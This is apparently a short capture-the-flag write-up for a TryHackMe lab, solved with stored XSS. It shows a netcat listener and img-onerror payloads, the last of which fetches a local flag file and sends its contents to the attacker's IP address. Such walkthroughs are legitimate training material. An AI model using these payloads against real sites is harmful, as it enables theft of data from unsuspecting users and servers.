https://tryhackme.com/room/thestickershop

Keyword: Stored XSS

Question Hint: Can you conduct any client-side exploitation in order to read the flag?

どうもありがとう, https://splitunknown.medium.com/the-sticker-shop-thm-walk-through-805b25ca6a59!

Based on the question hint, we can identify potential client-side vulnerabilities like XSS or CSRF.

Upon examining the website, we find a user-input Feedback page—this points clearly to XSS as our likely vector.

Thanks to https://splitunknown.medium.com/the-sticker-shop-thm-walk-through-805b25ca6a59, we'll test XSS using a modern payload that fetches from a local server. First, let's get our attacker's IP address:

$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.4.126.108  netmask 255.255.128.0  destination 10.4.126.108

Next, start the server:

nc -knvlp 9090

Now craft the payload:

<img src="x" onerror="fetch('10.4.126.108:9090')">

Navigate to http://10.10.130.23:8080/flag.txt to see the response:

We notice something interesting: why is the response origin localhost?

This suggests flag.txt is hosted locally. Our solution: fetch [http://localhost:8080](<http://localhost:8080>)/flag.txt and append it to a GET request to our server.

Here's our updated payload:

<img src="x" onerror="fetch('<http://127.0.0.1:8080/flag.txt>').then(r => r.text()).then(r => fetch('<http://10.4.126.108:9090?flag='+r>))">